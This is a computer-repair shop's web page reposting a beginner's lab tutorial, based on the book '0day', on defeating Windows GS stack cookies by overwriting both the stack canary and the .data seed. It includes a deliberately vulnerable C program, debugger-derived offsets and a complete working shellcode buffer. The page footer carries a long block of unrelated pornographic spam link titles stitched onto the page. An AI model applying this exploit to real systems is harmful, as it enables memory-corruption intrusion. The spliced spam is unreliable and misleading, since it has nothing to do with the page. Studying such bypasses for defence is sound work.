錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
同時替換棧中和.data中的Cookie突破GS

作者: 佚名  日期:2017-07-28 20:24:50   來源: 本站整理

 

最近剛剛接觸漏洞調試逆向,希望能夠將自己調試過程中的看法與大家分享,望大神們不要噴我。參考書籍就是有名的《0day》,作為想接觸漏洞的新手非常適合。
言歸正傳
GS機制:
GS會在函數調用前往函數棧幀內壓入一個隨機數(canary),然后等函數返回前,會對canary進行核查,判斷canary是否被修改。因為canary的地址是(前棧幀EBP-4),所以如果溢出攻擊想要覆蓋返回地址,就會路過canary。系統檢測到canary被修改之后,在函數返回前就會直接終止程序
GS流程:
  • 程序啟動時,讀取.data節的第一個dword。
  • 以這個dword為基數,通過和當前系統時間,進程ID,線程ID,性能計數器進行一系列加密運算(多次XOR)。
  • 把加密后的種子再寫入.data節的第一個dword。
  • 函數在執行前,把加密后的種子取出,與當前esp進行異或計算,結果存入“前EBP”的前面(低地址端)。
  • 函數主體正常執行。
  • 函數返回前,把canary取出與esp異或計算后,調用__security_check_cookie函數進行檢查,與.data節里的種子進行比較,如果校驗通過則返回原函數繼續執行。如果校驗失敗,則程序終止。

意思就是,.data第一個dword異或ebp后,存放到ebp低地址端,函數返回前,這個數再xor ebp,和.data中相比較。

GS突破的思路:
1、利用未被保護的內存突破GS
2、覆蓋虛函數突破GS(wnagzihxain有講到
3、攻擊SEH突破GS
4、同時替換棧中和.data中的cookie突破GS(同樣講到過

由于自己第一次發帖,剛好看到第四個突破技術,索性就記錄下來以便交流


我們不看代碼,試想一下,如果想要同時替換棧中和.data中的cookie,需要幾步。需要什么條件。
攻擊條件:
  • 首先這個條件就很苛刻,正常情況下,我們是無法訪問到.data段中的,只有當一個指針偏移沒有作判斷,能夠為我們所用,將它指向.data的時候,才能夠覆蓋修改.data的第一個dword。

代碼中創造的條件是這樣的,先申請一塊堆區,再創建一個指針指向的地址是堆區+偏移(i),當i為我們惡意構造的負數的時候,就有可能指向.data段。
  • 其次,要有shellcode覆蓋,代碼中給了一個strcpy,我們喜聞樂見的一個函數。

代碼如下(shellcode內容我們慢慢給出,這里先看程序):
[C] 純文本查看 復制代碼
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
void test(char * str, int i, char * src)
{
    char dest[200];
     
    if(i<0x9995)
    {
        char * buf=str+i;
        *buf=*src;
        *(buf+1)=*(src+1);
        *(buf+2)=*(src+2);
        *(buf+3)=*(src+3);
        strcpy(dest,src);
    }
}
void main()
{
    char * str=(char *)malloc(0x10000);
    //__asm int 3
    test(str,0xFFFF2FB8,shellcode);
}


攻擊調試步驟:
1、在調試的時候,確認堆區的地址和我們要覆蓋的.data首地址離多遠,這樣就能確認這個指針偏移 i 是多少;
2、確定shellcode的覆蓋偏移,到底哪個偏移地址是canary的位置;
前兩部可以利用函數返回時候的check_securitycookie函數查看系統是怎么檢查參數的
3、確定shellcode中canary的值,索性把shellcode的第一個dword設置為canary(90909090),那么我們用多少覆蓋呢,這需要在調試中xor ebp后確定;
4、確定shellcode組織結構。

下面和大家一起調試,確定shellcode的內容
調試環境:
XP sp3
vs 2008
release版本
optimization給disable掉(不然,調試代碼看不懂,canary異或的也是esp而不是ebp)

第一步,確定偏移
其實不能完全按照步驟進行參數獲取,因為后面有些參數可能在前面的調試中就已經獲取了,按步驟說只是便于理解。
先把shellcode設置為四個字節90909090.指針偏移也設置為0:

[C] 純文本查看 復制代碼
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include <string.h>
#include <stdlib.h>
char shellcode[]=
 
"\x90\x90\x90\x90"//new value of cookie in .data
;
void test(char * str, int i, char * src)
{
    char dest[200];
     
    if(i<0x9995)
    {
        char * buf=str+i;
        *buf=*src;
        *(buf+1)=*(src+1);
        *(buf+2)=*(src+2);
        *(buf+3)=*(src+3);
__asm int 3
        strcpy(dest,src);
    }
}
void main()
{
    char * str=(char *)malloc(0x10000);
    test(str,0,shellcode); 
}


我們首先要看cookie是怎么校驗的。原書中講到在if語句處中斷,我設置了int3之后,停下來發現cookie已經被放進.data了,所以我就下在了strcpy之前
 

這一步獲取的參數:
.data地址:0x00403000
棧中需要覆蓋canary的地址:0x0012FF60
棧中需要返回的地址0x0012FF68
堆分配首地址(這一步我忘記標出來了,他就是test函數test(str,0,shellcode)返回地址前、高地址處的第一個str的地址):0x00410048
計算可得:0x410048-0x403000=53320,由于這個偏移應該是負數,所以i=-53320=FFFF2FB8
這樣第一二步驟的參數已經得到了

將i修改后,如下:
[C] 純文本查看 復制代碼
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
void test(char * str, int i, char * src)
{
    char dest[200];
     
    if(i<0x9995)
    {
        char * buf=str+i;
        *buf=*src;
        *(buf+1)=*(src+1);
        *(buf+2)=*(src+2);
        *(buf+3)=*(src+3);
        __asm int 3
        strcpy(dest,src);
    }
}
void main()
{
    char * str=(char *)malloc(0x10000);
    test(str,0xFFFF2FB8,shellcode);
}


第二步,確定canary的值
如何確定?已經我們要將90909090寫入.data,GS校驗的時候,會將canary和ebp異或然后和90909090對比,所以,canary=90909090 xor 當時的ebp
int3位置不變,我們還定位到函數準備返回檢查canary的時候
 
canary = 0x0012ff64 xor 0x90909090 = 0x90826ff4



第三步,確定shellcode組織結構
對了,shellcode在棧中的位置還沒確定呢
還是剛才的斷點,在strcpy之前停下來,找shellcode 復制的棧中位置,這也是為什么設置90909090,因為明顯好找,還可以搜索
 
找到了shellcode地址=0x0012FE94
所以shellcode總大小=0x0012FE94-返回的地址0x0012FF68 +4=216字節
覆蓋返回地址:12FF68-12FF6B
覆蓋canary地址:12FF60-12FF63
最后12個字節是這樣的\xF4\x6F\x82\x90 \x90\x90\x90\x90 \x94\xFE\x12\x00
所以shellcode是這樣安排的:
\x90\x90\x90\x90||\xFC\x68···\x57\xF8||\x90···\x90|| \xF4\x6F\x82\x90 \x90\x90\x90\x90 \x94\xFE\x12\x00
4字節                       168字節                     32字節(216-4-168-12=32字節)           12個字節

最終形成代碼
[C] 純文本查看 復制代碼
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#include <string.h>
#include <stdlib.h>
char shellcode[]=
 
"\x90\x90\x90\x90"//new value of cookie in .data
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xF4\x6F\x82\x90"//result of \x90\x90\x90\x90 xor EBP
"\x90\x90\x90\x90"
"\x94\xFE\x12\x00"//address of shellcode
;
void test(char * str, int i, char * src)
{
    char dest[200];
     
    if(i<0x9995)
    {
        char * buf=str+i;
        *buf=*src;
        *(buf+1)=*(src+1);
        *(buf+2)=*(src+2);
        *(buf+3)=*(src+3);
        strcpy(dest,src);
    }
}
void main()
{
    char * str=(char *)malloc(0x10000);
    //__asm int 3
    test(str,0xFFFF2FB8,shellcode);
}

 

成功溢出。


熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 无码国产精品一区二区免费式直播 | 麻豆国产精品无码视频| 亚洲精品天堂无码中文字幕| 无码av不卡一区二区三区| 亚洲AV成人无码久久精品老人| 在线观看成人无码中文av天堂| 东京热av人妻无码| 午夜亚洲AV日韩AV无码大全| 国产精品无码亚洲一区二区三区| 国产成人A亚洲精V品无码| 亚洲av无码专区在线观看亚| 国产丝袜无码一区二区三区视频| 久久亚洲中文无码咪咪爱| 亚洲国产精品无码久久久不卡| 人妻无码久久精品| 中文无码一区二区不卡αv| 成年午夜无码av片在线观看| 无码中文字幕人妻在线一区二区三区| 无码人妻丰满熟妇啪啪| 亚洲精品无码成人| 久久精品亚洲中文字幕无码麻豆| 精品久久久无码中文字幕天天| 久久亚洲中文字幕无码| 亚洲av成本人无码网站| 久久精品亚洲AV久久久无码| 亚洲av无码一区二区三区乱子伦| 久久久无码精品亚洲日韩软件| 热の无码热の有码热の综合| 亚洲国产成人无码AV在线影院| 无码乱码av天堂一区二区| 日日摸日日踫夜夜爽无码| 亚洲AV无码久久精品成人| 亚洲AV无码第一区二区三区| 久久老子午夜精品无码怎么打| 亚洲AV永久无码区成人网站| 亚洲AV无码不卡在线播放| 少妇人妻偷人精品无码视频| 无码午夜成人1000部免费视频| 日韩精品无码一区二区三区| 国产AV无码专区亚汌A√| 无码精品人妻一区二区三区中|